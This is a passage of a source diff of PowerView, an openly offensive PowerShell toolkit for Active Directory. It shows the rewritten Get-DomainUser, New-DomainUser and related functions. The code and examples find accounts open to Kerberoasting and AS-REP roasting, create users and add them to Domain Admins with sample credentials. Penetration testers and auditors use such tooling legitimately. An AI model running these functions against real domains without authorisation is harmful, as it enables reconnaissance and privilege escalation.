ReferenceObjectClass : $ReferenceObjectClass" + } + else { + Write-Verbose "[Find-DomainObjectPropertyOutlier] Using the default reference property set for the object class '$ClassName'" + } + + if (($ClassName -eq 'User') -or ($ReferenceObjectClass -eq 'User')) { + $Objects = Get-DomainUser @SearcherArguments + if (-not $ReferenceObjectProperties) { + $ReferenceObjectProperties = $UserReferencePropertySet } - catch { - Write-Verbose $_ + } + elseif (($ClassName -eq 'Group') -or ($ReferenceObjectClass -eq 'Group')) { + $Objects = Get-DomainGroup @SearcherArguments + if (-not $ReferenceObjectProperties) { + $ReferenceObjectProperties = $GroupReferencePropertySet + } + } + elseif (($ClassName -eq 'Computer') -or ($ReferenceObjectClass -eq 'Computer')) { + $Objects = Get-DomainComputer @SearcherArguments + if (-not $ReferenceObjectProperties) { + $ReferenceObjectProperties = $ComputerReferencePropertySet + } + } + else { + throw "[Find-DomainObjectPropertyOutlier] Invalid class: $ClassName" + } + + ForEach ($Object in $Objects) { + $ObjectProperties = Get-Member -InputObject $Object -MemberType NoteProperty | Select-Object -Expand Name + ForEach($ObjectProperty in $ObjectProperties) { + if ($ReferenceObjectProperties -NotContains $ObjectProperty) { + $Out = New-Object PSObject + $Out | Add-Member Noteproperty 'SamAccountName' $Object.SamAccountName + $Out | Add-Member Noteproperty 'Property' $ObjectProperty + $Out | Add-Member Noteproperty 'Value' $Object.$ObjectProperty + $Out.PSObject.TypeNames.Insert(0, 'PowerView.PropertyOutlier') + $Out + } } } } } -function Get-NetSubnet { +######################################################## +# +# "net *" replacements and other fun start below +# +######################################################## + +function Get-DomainUser { <# - .SYNOPSIS +.SYNOPSIS - Gets a list of all current subnets in a domain. +Return all users or specific user objects in AD. - .PARAMETER SiteName +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Convert-ADName, Convert-LDAPProperty - Only return subnets from the specified SiteName. +.DESCRIPTION - .PARAMETER Domain +Builds a directory searcher object using Get-DomainSearcher, builds a custom +LDAP filter based on targeting/filter parameters, and searches for all objects +matching the criteria. To only return specific properties, use +"-Properties samaccountname,usnchanged,...". By default, all user objects for +the current domain are returned. - The domain to query for subnets, defaults to the current domain. +.PARAMETER Identity - .PARAMETER DomainController +A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201). +Wildcards accepted. Also accepts DOMAIN\user format. - Domain controller to reflect LDAP queries through. +.PARAMETER SPN - .PARAMETER ADSpath +Switch. Only return user objects with non-null service principal names. - The LDAP source to search through. +.PARAMETER UACFilter - .PARAMETER FullData +Dynamic parameter that accepts one or more values from $UACEnum, including +"NOT_X" negation forms. To see all possible values, run '0|ConvertFrom-UACValue -ShowAll'. - Switch. Return full subnet objects instead of just object names (the default). +.PARAMETER AdminCount - .PARAMETER PageSize +Switch. Return users with '(adminCount=1)' (meaning are/were privileged). - The PageSize to set for the LDAP searcher object. +.PARAMETER AllowDelegation - .PARAMETER Credential +Switch. Return user accounts that are not marked as 'sensitive and not allowed for delegation' - A [Management.Automation.PSCredential] object of alternate credentials - for connection to the target domain. +.PARAMETER DisallowDelegation - .EXAMPLE +Switch. Return user accounts that are marked as 'sensitive and not allowed for delegation' - PS C:\> Get-NetSubnet - - Returns all subnet names in the current domain. +.PARAMETER TrustedToAuth - .EXAMPLE +Switch. Return computer objects that are trusted to authenticate for other principals. - PS C:\> Get-NetSubnet -Domain testlab.local -FullData - - Returns the full data objects for all subnets in testlab.local -#> +.PARAMETER PreauthNotRequired - [CmdletBinding()] - Param ( - [Parameter(ValueFromPipeline=$True)] - [String] - $SiteName = "*", +Switch. Return user accounts with "Do not require Kerberos preauthentication" set. - [String] - $Domain, +.PARAMETER Domain - [String] - $ADSpath, +Specifies the domain to use for the query, defaults to the current domain. - [String] - $DomainController, +.PARAMETER LDAPFilter - [Switch] - $FullData, +Specifies an LDAP query string that is used to filter Active Directory objects. - [ValidateRange(1,10000)] - [Int] - $PageSize = 200, +.PARAMETER Properties - [Management.Automation.PSCredential] - $Credential - ) +Specifies the properties of the output object to retrieve from the server. - begin { - $SubnetSearcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $ADSpath -ADSprefix "CN=Subnets,CN=Sites,CN=Configuration" -PageSize $PageSize - } +.PARAMETER SearchBase - process { - if($SubnetSearcher) { +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. - $SubnetSearcher.filter="(&(objectCategory=subnet))" +.PARAMETER Server - try { - $Results = $SubnetSearcher.FindAll() - $Results | Where-Object {$_} | ForEach-Object { - if ($FullData) { - # convert/process the LDAP fields for each result - Convert-LDAPProperty -Properties $_.Properties | Where-Object { $_.siteobject -match "CN=$SiteName" } - } - else { - # otherwise just return the subnet name and site name - if ( ($SiteName -and ($_.properties.siteobject -match "CN=$SiteName,")) -or ($SiteName -eq '*')) { +Specifies an Active Directory server (domain controller) to bind to. - $SubnetProperties = @{ - 'Subnet' = $_.properties.name[0] - } - try { - $SubnetProperties['Site'] = ($_.properties.siteobject[0]).split(",")[0] - } - catch { - $SubnetProperties['Site'] = 'Error' - } +.PARAMETER SearchScope - New-Object -TypeName PSObject -Property $SubnetProperties - } - } - } - $Results.dispose() - $SubnetSearcher.dispose() - } - catch { - Write-Warning $_ - } - } - } -} +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). +.PARAMETER ResultPageSize -function Get-DomainSID { -<# - .SYNOPSIS +Specifies the PageSize to set for the LDAP searcher object. - Gets the SID for the domain. +.PARAMETER ServerTimeLimit - .PARAMETER Domain +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. - The domain to query, defaults to the current domain. +.PARAMETER SecurityMasks - .PARAMETER DomainController +Specifies an option for examining security information of a directory object. +One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'. - Domain controller to reflect LDAP queries through. +.PARAMETER Tombstone - .EXAMPLE +Switch. Specifies that the searcher should also return deleted/tombstoned objects. - C:\> Get-DomainSID -Domain TEST - - Returns SID for the domain 'TEST' -#> +.PARAMETER FindOne - param( - [String] - $Domain, +Only return one result object. - [String] - $DomainController - ) +.PARAMETER Credential - $DCSID = Get-NetComputer -Domain $Domain -DomainController $DomainController -FullData -Filter '(userAccountControl:1.2.840.113556.1.4.803:=8192)' | Select-Object -First 1 -ExpandProperty objectsid - if($DCSID) { - $DCSID.Substring(0, $DCSID.LastIndexOf('-')) - } - else { - Write-Verbose "Error extracting domain SID for $Domain" - } -} +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. +.PARAMETER Raw -function Get-NetGroup { -<# - .SYNOPSIS +Switch. Return raw results instead of translating the fields into a custom PSObject. - Gets a list of all current groups in a domain, or all - the groups a given user/group object belongs to. +.EXAMPLE - .PARAMETER GroupName +Get-DomainUser -Domain testlab.local - The group name to query for, wildcards accepted. +Return all users for the testlab.local domain - .PARAMETER SID +.EXAMPLE - The group SID to query for. +Get-DomainUser "S-1-5-21-890171859-3433809279-3366196753-1108","administrator" - .PARAMETER UserName +Return the user with the given SID, as well as Administrator. - The user name (or group name) to query for all effective - groups of. +.EXAMPLE - .PARAMETER Filter +'S-1-5-21-890171859-3433809279-3366196753-1114', 'CN=dfm,CN=Users,DC=testlab,DC=local','4c435dd7-dc58-4b14-9a5e-1fdb0e80d201','administrator' | Get-DomainUser -Properties samaccountname,lastlogoff - A customized ldap filter string to use, e.g. "(description=*admin*)" +lastlogoff samaccountname +---------- -------------- +12/31/1600 4:00:00 PM dfm.a +12/31/1600 4:00:00 PM dfm +12/31/1600 4:00:00 PM harmj0y +12/31/1600 4:00:00 PM Administrator - .PARAMETER Domain +.EXAMPLE - The domain to query for groups, defaults to the current domain. +Get-DomainUser -SearchBase "LDAP://OU=secret,DC=testlab,DC=local" -AdminCount -AllowDelegation - .PARAMETER DomainController +Search the specified OU for privileged user (AdminCount = 1) that allow delegation - Domain controller to reflect LDAP queries through. +.EXAMPLE - .PARAMETER ADSpath +Get-DomainUser -LDAPFilter '(!primarygroupid=513)' -Properties samaccountname,lastlogon - The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" - Useful for OU queries. +Search for users with a primary group ID other than 513 ('domain users') and only return samaccountname and lastlogon - .PARAMETER AdminCount +.EXAMPLE - Switch. Return group with adminCount=1. +Get-DomainUser -UACFilter DONT_REQ_PREAUTH,NOT_PASSWORD_EXPIRED - .PARAMETER FullData +Find users who doesn't require Kerberos preauthentication and DON'T have an expired password. - Switch. Return full group objects instead of just object names (the default). +.EXAMPLE - .PARAMETER RawSids +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainUser -Credential $Cred - Switch. Return raw SIDs when using "Get-NetGroup -UserName X" +.EXAMPLE - .PARAMETER PageSize +Get-Domain | Select-Object -Expand name +testlab.local - The PageSize to set for the LDAP searcher object. +Get-DomainUser dev\user1 -Verbose -Properties distinguishedname +VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local +VERBOSE: [Get-DomainUser] filter string: (&(samAccountType=805306368)(|(samAccountName=user1))) - .PARAMETER Credential +distinguishedname +----------------- +CN=user1,CN=Users,DC=dev,DC=testlab,DC=local - A [Management.Automation.PSCredential] object of alternate credentials - for connection to the target domain. +.INPUTS - .PARAMETER AllTypes +String - By default we will retrieve only Security, not Distribution Groups. +.OUTPUTS - .EXAMPLE +PowerView.User - PS C:\> Get-NetGroup +Custom PSObject with translated user property fields. - Returns the current security groups in the domain. +PowerView.User.Raw - .EXAMPLE +The raw DirectoryServices.SearchResult object, if -Raw is enabled. +#> - PS C:\> Get-NetGroup -GroupName *admin* + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.User')] + [OutputType('PowerView.User.Raw')] + [CmdletBinding(DefaultParameterSetName = 'AllowDelegation')] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('DistinguishedName', 'SamAccountName', 'Name', 'MemberDistinguishedName', 'MemberName')] + [String[]] + $Identity, - Returns all groups with "admin" in their group name. + [Switch] + $SPN, - .EXAMPLE + [Switch] + $AdminCount, - PS C:\> Get-NetGroup -Domain testing -FullData + [Parameter(ParameterSetName = 'AllowDelegation')] + [Switch] + $AllowDelegation, - Returns full group data objects in the 'testing' domain -#> + [Parameter(ParameterSetName = 'DisallowDelegation')] + [Switch] + $DisallowDelegation, - [CmdletBinding()] - param( - [Parameter(ValueFromPipeline=$True)] - [String] - $GroupName = '*', + [Switch] + $TrustedToAuth, - [String] - $SID, + [Alias('KerberosPreauthNotRequired', 'NoPreauth')] + [Switch] + $PreauthNotRequired, + [ValidateNotNullOrEmpty()] [String] - $UserName, + $Domain, + [ValidateNotNullOrEmpty()] + [Alias('Filter')] [String] - $Filter, + $LDAPFilter, + [ValidateNotNullOrEmpty()] + [String[]] + $Properties, + + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] [String] - $Domain, + $SearchBase, + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] [String] - $DomainController, + $Server, + [ValidateSet('Base', 'OneLevel', 'Subtree')] [String] - $ADSpath, + $SearchScope = 'Subtree', - [Switch] - $AdminCount, + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, - [Switch] - $FullData, + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, - [Switch] - $RawSids, + [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')] + [String] + $SecurityMasks, [Switch] - $AllTypes, + $Tombstone, - [ValidateRange(1,10000)] - [Int] - $PageSize = 200, + [Alias('ReturnOne')] + [Switch] + $FindOne, [Management.Automation.PSCredential] - $Credential + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, + + [Switch] + $Raw ) - begin { - $GroupSearcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $ADSpath -PageSize $PageSize - if (!$AllTypes) - { - $Filter += "(groupType:1.2.840.113556.1.4.803:=2147483648)" - } + DynamicParam { + $UACValueNames = [Enum]::GetNames($UACEnum) + # add in the negations + $UACValueNames = $UACValueNames | ForEach-Object {$_; "NOT_$_"} + # create new dynamic parameter + New-DynamicParameter -Name UACFilter -ValidateSet $UACValueNames -Type ([array]) } - process { - if($GroupSearcher) { - - if($AdminCount) { - Write-Verbose "Checking for adminCount=1" - $Filter += "(admincount=1)" - } - - if ($UserName) { - # get the raw user object - $User = Get-ADObject -SamAccountName $UserName -Domain $Domain -DomainController $DomainController -Credential $Credential -ReturnRaw -PageSize $PageSize | Select-Object -First 1 - - if($User) { - # convert the user to a directory entry - $UserDirectoryEntry = $User.GetDirectoryEntry() - - # cause the cache to calculate the token groups for the user - $UserDirectoryEntry.RefreshCache("tokenGroups") + BEGIN { + $SearcherArguments = @{} + if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties } + if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks } + if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + $UserSearcher = Get-DomainSearcher @SearcherArguments + } - $UserDirectoryEntry.TokenGroups | ForEach-Object { - # convert the token group sid - $GroupSid = (New-Object System.Security.Principal.SecurityIdentifier($_,0)).Value + PROCESS { + #bind dynamic parameter to a friendly variable + if ($PSBoundParameters -and ($PSBoundParameters.Count -ne 0)) { + New-DynamicParameter -CreateVariables -BoundParameters $PSBoundParameters + } - # ignore the built in groups - if($GroupSid -notmatch '^S-1-5-32-.*') { - if($FullData) { - $Group = Get-ADObject -SID $GroupSid -PageSize $PageSize -Domain $Domain -DomainController $DomainController -Credential $Credential - $Group.PSObject.TypeNames.Add('PowerView.Group') - $Group - } - else { - if($RawSids) { - $GroupSid - } - else { - Convert-SidToName -SID $GroupSid - } - } + if ($UserSearcher) { + $IdentityFilter = '' + $Filter = '' + $Identity | Where-Object {$_} | ForEach-Object { + $IdentityInstance = $_.Replace('(', '\28').Replace(')', '\29') + if ($IdentityInstance -match '^S-1-') { + $IdentityFilter += "(objectsid=$IdentityInstance)" + } + elseif ($IdentityInstance -match '^CN=') { + $IdentityFilter += "(distinguishedname=$IdentityInstance)" + if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) { + # if a -Domain isn't explicitly set, extract the object domain out of the distinguishedname + # and rebuild the domain searcher + $IdentityDomain = $IdentityInstance.SubString($IdentityInstance.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' + Write-Verbose "[Get-DomainUser] Extracted domain '$IdentityDomain' from '$IdentityInstance'" + $SearcherArguments['Domain'] = $IdentityDomain + $UserSearcher = Get-DomainSearcher @SearcherArguments + if (-not $UserSearcher) { + Write-Warning "[Get-DomainUser] Unable to retrieve domain searcher for '$IdentityDomain'" } } } + elseif ($IdentityInstance -imatch '^[0-9A-F]{8}-([0-9A-F]{4}-){3}[0-9A-F]{12}$') { + $GuidByteString = (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object { '\' + $_.ToString('X2') }) -join '' + $IdentityFilter += "(objectguid=$GuidByteString)" + } + elseif ($IdentityInstance.Contains('\')) { + $ConvertedIdentityInstance = $IdentityInstance.Replace('\28', '(').Replace('\29', ')') | Convert-ADName -OutputType Canonical + if ($ConvertedIdentityInstance) { + $UserDomain = $ConvertedIdentityInstance.SubString(0, $ConvertedIdentityInstance.IndexOf('/')) + $UserName = $IdentityInstance.Split('\')[1] + $IdentityFilter += "(samAccountName=$UserName)" + $SearcherArguments['Domain'] = $UserDomain + Write-Verbose "[Get-DomainUser] Extracted domain '$UserDomain' from '$IdentityInstance'" + $UserSearcher = Get-DomainSearcher @SearcherArguments + } + } else { - Write-Warning "UserName '$UserName' failed to resolve." + $IdentityFilter += "(samAccountName=$IdentityInstance)" } } - else { - if ($SID) { - $GroupSearcher.filter = "(&(objectCategory=group)(objectSID=$SID)$Filter)" + + if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) { + $Filter += "(|$IdentityFilter)" + } + + if ($PSBoundParameters['SPN']) { + Write-Verbose '[Get-DomainUser] Searching for non-null service principal names' + $Filter += '(servicePrincipalName=*)' + } + if ($PSBoundParameters['AllowDelegation']) { + Write-Verbose '[Get-DomainUser] Searching for users who can be delegated' + # negation of "Accounts that are sensitive and not trusted for delegation" + $Filter += '(!(userAccountControl:1.2.840.113556.1.4.803:=1048574))' + } + if ($PSBoundParameters['DisallowDelegation']) { + Write-Verbose '[Get-DomainUser] Searching for users who are sensitive and not trusted for delegation' + $Filter += '(userAccountControl:1.2.840.113556.1.4.803:=1048574)' + } + if ($PSBoundParameters['AdminCount']) { + Write-Verbose '[Get-DomainUser] Searching for adminCount=1' + $Filter += '(admincount=1)' + } + if ($PSBoundParameters['TrustedToAuth']) { + Write-Verbose '[Get-DomainUser] Searching for users that are trusted to authenticate for other principals' + $Filter += '(msds-allowedtodelegateto=*)' + } + if ($PSBoundParameters['PreauthNotRequired']) { + Write-Verbose '[Get-DomainUser] Searching for user accounts that do not require kerberos preauthenticate' + $Filter += '(userAccountControl:1.2.840.113556.1.4.803:=4194304)' + } + if ($PSBoundParameters['LDAPFilter']) { + Write-Verbose "[Get-DomainUser] Using additional LDAP filter: $LDAPFilter" + $Filter += "$LDAPFilter" + } + + # build the LDAP filter for the dynamic UAC filter value + $UACFilter | Where-Object {$_} | ForEach-Object { + if ($_ -match 'NOT_.*') { + $UACField = $_.Substring(4) + $UACValue = [Int]($UACEnum::$UACField) + $Filter += "(!(userAccountControl:1.2.840.113556.1.4.803:=$UACValue))" } else { - $GroupSearcher.filter = "(&(objectCategory=group)(samaccountname=$GroupName)$Filter)" + $UACValue = [Int]($UACEnum::$_) + $Filter += "(userAccountControl:1.2.840.113556.1.4.803:=$UACValue)" } + } - $Results = $GroupSearcher.FindAll() - $Results | Where-Object {$_} | ForEach-Object { - # if we're returning full data objects - if ($FullData) { - # convert/process the LDAP fields for each result - $Group = Convert-LDAPProperty -Properties $_.Properties - $Group.PSObject.TypeNames.Add('PowerView.Group') - $Group - } - else { - # otherwise we're just returning the group name - $_.properties.samaccountname - } + $UserSearcher.filter = "(&(samAccountType=805306368)$Filter)" + Write-Verbose "[Get-DomainUser] filter string: $($UserSearcher.filter)" + + if ($PSBoundParameters['FindOne']) { $Results = $UserSearcher.FindOne() } + else { $Results = $UserSearcher.FindAll() } + $Results | Where-Object {$_} | ForEach-Object { + if ($PSBoundParameters['Raw']) { + # return raw result objects + $User = $_ + $User.PSObject.TypeNames.Insert(0, 'PowerView.User.Raw') + } + else { + $User = Convert-LDAPProperty -Properties $_.Properties + $User.PSObject.TypeNames.Insert(0, 'PowerView.User') + } + $User + } + if ($Results) { + try { $Results.dispose() } + catch { + Write-Verbose "[Get-DomainUser] Error disposing of the Results object: $_" } - $Results.dispose() - $GroupSearcher.dispose() } + $UserSearcher.dispose() } } } -function Get-NetGroupMember { +function New-DomainUser { <# - .SYNOPSIS +.SYNOPSIS + +Creates a new domain user (assuming appropriate permissions) and returns the user object. - This function users [ADSI] and LDAP to query the current AD context - or trusted domain for users in a specified group. If no GroupName is - specified, it defaults to querying the "Domain Admins" group. - This is a replacement for "net group 'name' /domain" +TODO: implement all properties that New-ADUser implements (https://technet.microsoft.com/en-us/library/ee617253.aspx). - .PARAMETER GroupName +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-PrincipalContext - The group name to query for users. +.DESCRIPTION - .PARAMETER SID +First binds to the specified domain context using Get-PrincipalContext. +The bound domain context is then used to create a new +DirectoryServices.AccountManagement.UserPrincipal with the specified user properties. - The Group SID to query for users. If not given, it defaults to 512 "Domain Admins" +.PARAMETER SamAccountName - .PARAMETER Filter +Specifies the Security Account Manager (SAM) account name of the user to create. +Maximum of 256 characters. Mandatory. - A customized ldap filter string to use, e.g. "(description=*admin*)" +.PARAMETER AccountPassword - .PARAMETER Domain +Specifies the password for the created user. Mandatory. - The domain to query for group users, defaults to the current domain. +.PARAMETER Name - .PARAMETER DomainController +Specifies the name of the user to create. If not provided, defaults to SamAccountName. - Domain controller to reflect LDAP queries through. +.PARAMETER DisplayName - .PARAMETER ADSpath +Specifies the display name of the user to create. If not provided, defaults to SamAccountName. - The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" - Useful for OU queries. +.PARAMETER Description - .PARAMETER FullData +Specifies the description of the user to create. - Switch. Returns full data objects instead of just group/users. +.PARAMETER Domain - .PARAMETER Recurse +Specifies the domain to use to search for user/group principals, defaults to the current domain. - Switch. If the group member is a group, recursively try to query its members as well. +.PARAMETER Credential - .PARAMETER UseMatchingRule +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. - Switch. Use LDAP_MATCHING_RULE_IN_CHAIN in the LDAP search query when -Recurse is specified. - Much faster than manual recursion, but doesn't reveal cross-domain groups. +.EXAMPLE - .PARAMETER PageSize +$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +New-DomainUser -SamAccountName harmj0y2 -Description 'This is harmj0y' -AccountPassword $UserPassword - The PageSize to set for the LDAP searcher object. +Creates the 'harmj0y2' user with the specified description and password. - .PARAMETER Credential +.EXAMPLE - A [Management.Automation.PSCredential] object of alternate credentials - for connection to the target domain. +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$user = New-DomainUser -SamAccountName harmj0y2 -Description 'This is harmj0y' -AccountPassword $UserPassword -Credential $Cred - .EXAMPLE +Creates the 'harmj0y2' user with the specified description and password, using the specified +alternate credentials. - PS C:\> Get-NetGroupMember - - Returns the usernames that of members of the "Domain Admins" domain group. +.EXAMPLE - .EXAMPLE +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +New-DomainUser -SamAccountName andy -AccountPassword $UserPassword -Credential $Cred | Add-DomainGroupMember 'Domain Admins' -Credential $Cred - PS C:\> Get-NetGroupMember -Domain testing -GroupName "Power Users" - - Returns the usernames that of members of the "Power Users" group in the 'testing' domain. +Creates the 'andy' user with the specified description and password, using the specified +alternate credentials, and adds the user to 'domain admins' using Add-DomainGroupMember +and the alternate credentials. - .LINK +.OUTPUTS - http://www.powershellmagazine.com/2013/05/23/pstip-retrieve-group-membership-of-an-active-directory-group-recursively/ +DirectoryServices.AccountManagement.UserPrincipal + +.LINK + +http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/ #> - [CmdletBinding()] - param( - [Parameter(ValueFromPipeline=$True)] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('DirectoryServices.AccountManagement.UserPrincipal')] + Param( + [Parameter(Mandatory = $True)] + [ValidateLength(0, 256)] [String] - $GroupName, + $SamAccountName, - [String] - $SID, + [Parameter(Mandatory = $True)] + [ValidateNotNullOrEmpty()] + [Alias('Password')] + [Security.SecureString] + $AccountPassword, + [ValidateNotNullOrEmpty()] [String] - $Domain, + $Name, + [ValidateNotNullOrEmpty()] [String] - $DomainController, + $DisplayName, + [ValidateNotNullOrEmpty()] [String] - $ADSpath, + $Description, - [Switch] - $FullData, + [ValidateNotNullOrEmpty()] + [String] + $Domain, - [Switch] - $Recurse, + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) - [Switch] - $UseMatchingRule, + $ContextArguments = @{ + 'Identity' = $SamAccountName + } + if ($PSBoundParameters['Domain']) { $ContextArguments['Domain'] = $Domain } + if ($PSBoundParameters['Credential']) { $ContextArguments['Credential'] = $Credential } + $Context = Get-PrincipalContext @ContextArguments - [ValidateRange(1,10000)] - [Int] - $PageSize = 200, + if ($Context) { + $User = New-Object -TypeName System.DirectoryServices.AccountManagement.UserPrincipal -ArgumentList ($Context.Context) - [Management.Automation.PSCredential] - $Credential - ) + # set all the appropriate user parameters + $User.SamAccountName = $Context.Identity + $TempCred = New-Object System.Management.Automation.PSCredential('a', $AccountPassword) + $User.SetPassword($TempCred.GetNetworkCredential().Password) + $User.Enabled = $True + $User.PasswordNotRequired = $False - begin { - if($DomainController) { - $TargetDomainController = $DomainController + if ($PSBoundParameters['Name']) { + $User.Name = $Name } else { - $TargetDomainController = ((Get-NetDomain -Credential $Credential).PdcRoleOwner).Name + $User.Name = $Context.Identity } - - if($Domain) { - $TargetDomain = $Domain + if ($PSBoundParameters['DisplayName']) { + $User.DisplayName = $DisplayName } else { - $TargetDomain = Get-NetDomain -Credential $Credential | Select-Object -ExpandProperty name + $User.DisplayName = $Context.Identity + } + + if ($PSBoundParameters['Description']) { + $User.Description = $Description } - # so this isn't repeated if users are passed on the pipeline - $GroupSearcher = Get-DomainSearcher -Domain $TargetDomain -DomainController $TargetDomainController -Credential $Credential -ADSpath $ADSpath -PageSize $PageSize + Write-Verbose "[New-DomainUser] Attempting to create user '$SamAccountName'" + try { + $Null = $User.Save() + Write-Verbose "[New-DomainUser] User '$SamAccountName' successfully created" + $User + } + catch { + Write-Warning "[New-DomainUser] Error creating user '$SamAccountName' : $_" + } } +} - process { - if ($GroupSearcher) { - if ($Recurse -and $UseMatchingRule) { - # resolve the group to a distinguishedname - if ($GroupName) { - $Group = Get-NetGroup -AllTypes -GroupName $GroupName -Domain $TargetDomain -DomainController $TargetDomainController -Credential $Credential -FullData -PageSize $PageSize - } - elseif ($SID) { - $Group = Get-NetGroup -AllTypes -SID $SID -Domain $TargetDomain -DomainController $TargetDomainController -Credential $Credential -FullData -PageSize $PageSize - } - else { - # default to domain admins - $SID = (Get-DomainSID -Domain $TargetDomain -DomainController $TargetDomainController) + "-512" - $Group = Get-NetGroup -AllTypes -SID $SID -Domain $TargetDomain -DomainController $TargetDomainController -Credential $Credential -FullData -PageSize $PageSize - } - $GroupDN = $Group.distinguishedname - $GroupFoundName = $Group.samaccountname - if ($GroupDN) { - $GroupSearcher.filter = "(&(samAccountType=805306368)(memberof:1.2.840.113556.1.4.1941:=$GroupDN)$Filter)" - $GroupSearcher.PropertiesToLoad.AddRange(('distinguishedName','samaccounttype','lastlogon','lastlogontimestamp','dscorepropagationdata','objectsid','whencreated','badpasswordtime','accountexpires','iscriticalsystemobject','name','usnchanged','objectcategory','description','codepage','instancetype','countrycode','distinguishedname','cn','admincount','logonhours','objectclass','logoncount','usncreated','useraccountcontrol','objectguid','primarygroupid','lastlogoff','samaccountname','badpwdcount','whenchanged','memberof','pwdlastset','adspath')) +function Set-DomainUserPassword { +<# +.SYNOPSIS - $Members = $GroupSearcher.FindAll() - $GroupFoundName = $GroupName - } - else { - Write-Error "Unable to find Group" - } - } - else { - if ($GroupName) { - $GroupSearcher.filter = "(&(objectCategory=group)(samaccountname=$GroupName)$Filter)" - } - elseif ($SID) { - $GroupSearcher.filter = "(&(objectCategory=group)(objectSID=$SID)$Filter)" - } - else { - # default to domain admins - $SID = (Get-DomainSID -Domain $TargetDomain -DomainController $TargetDomainController) + "-512" - $GroupSearcher.filter = "(&(objectCategory=group)(objectSID=$SID)$Filter)" - } +Sets the password for a given user identity. - try { - $Result = $GroupSearcher.FindOne() - } - catch { - $Members = @() - } +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-PrincipalContext - $GroupFoundName = '' +.DESCRIPTION - if ($Result) { - $Members = $Result.properties.item("member") +First binds to the specified domain context using Get-PrincipalContext. +The bound domain context is then used to search for the specified user -Identity, +which returns a DirectoryServices.AccountManagement.UserPrincipal object. The +SetPassword() function is then invoked on the user, setting the password to -AccountPassword. - if($Members.count -eq 0) { +.PARAMETER Identity - $Finished = $False - $Bottom = 0 - $Top = 0 +A user SamAccountName (e.g. User1), DistinguishedName (e.g. CN=user1,CN=Users,DC=testlab,DC=local), +SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1113), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201) +specifying the user to reset the password for. - while(!$Finished) { - $Top = $Bottom + 1499 - $MemberRange="member;range=$Bottom-$Top" - $Bottom += 1500 - - $GroupSearcher.PropertiesToLoad.Clear() - [void]$GroupSearcher.PropertiesToLoad.Add("$MemberRange") - [void]$GroupSearcher.PropertiesToLoad.Add("samaccountname") - try { 